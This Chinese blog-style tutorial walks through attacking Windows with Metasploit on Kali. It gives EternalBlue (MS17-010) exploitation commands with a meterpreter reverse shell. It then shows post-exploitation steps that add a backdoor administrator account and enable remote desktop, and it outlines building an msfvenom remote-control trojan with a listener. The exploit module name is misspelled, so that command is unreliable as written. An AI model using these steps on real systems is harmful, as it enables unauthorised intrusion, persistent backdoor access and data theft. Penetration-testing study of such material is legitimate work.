Strawberry-kali

提示:版权归Strawberry所有(大数据2202Byj)
未经授权,禁止搬用。
Q:2467175589

1.kali–msf渗透工具

1.体验-metasploit

1.msfconsole:启动metasploit命令行[命令行效率高,使用方便]
2.启动metesploit前需要做:

打开kali终端
使用sudo su命令,并输入kali的密码,切换到root用户
使用msfdb init命令,初始化metasploit数据库(*可选)

三个使用法则:
使用模块–>配置模块必选项–>运行模块

1.metasploit(1)windows永恒之蓝漏洞。

介绍:
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
*metasploit攻击永恒之蓝全流程
1.使用模块
use exploit/windows/smb/sm17_010_etemalblue
2.设置必选项
查看必选项[required为yes的就是必选项]
show options
3.设置必选项
set RHOSTS ip
set payload windows/x64/meterpreter/reverse_tcp
[payload是攻击载荷,就是攻击完想干啥,这里是获取meterpreter]
set lhost ip
[lhosts为listen host 代表你是谁,既kali的IP地址]
set lport 1-65535
[LPORT为listen port,代表你要在kali上开启的端口,1-65535随便选但是不能被占用]
4.运行模块,完成攻击
run

攻击成功后能干什么?
meterpreter是强大的后渗透模块,可以使用help查看帮助信息
远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统......
例如创建后门用户并开启远程连接
shell
net user zhangsan 123456 /add && net localgroup administrators zhangsan /add
exit
run getgui -e

2.生成远控木马

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线
[msfvenom在shell里使用,不是msfconsole终端]
windows可执行程序后门:
在这里插入图片描述

1.启动远控程序

1.启动msfconsole
2.使用监听模块use exploit/multi/handler
3.设置set payload 跟上面msfvenom的payload选择一样的
4.set lhost kaliIP
5.set lport 上面的端口
6.启动模块run

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值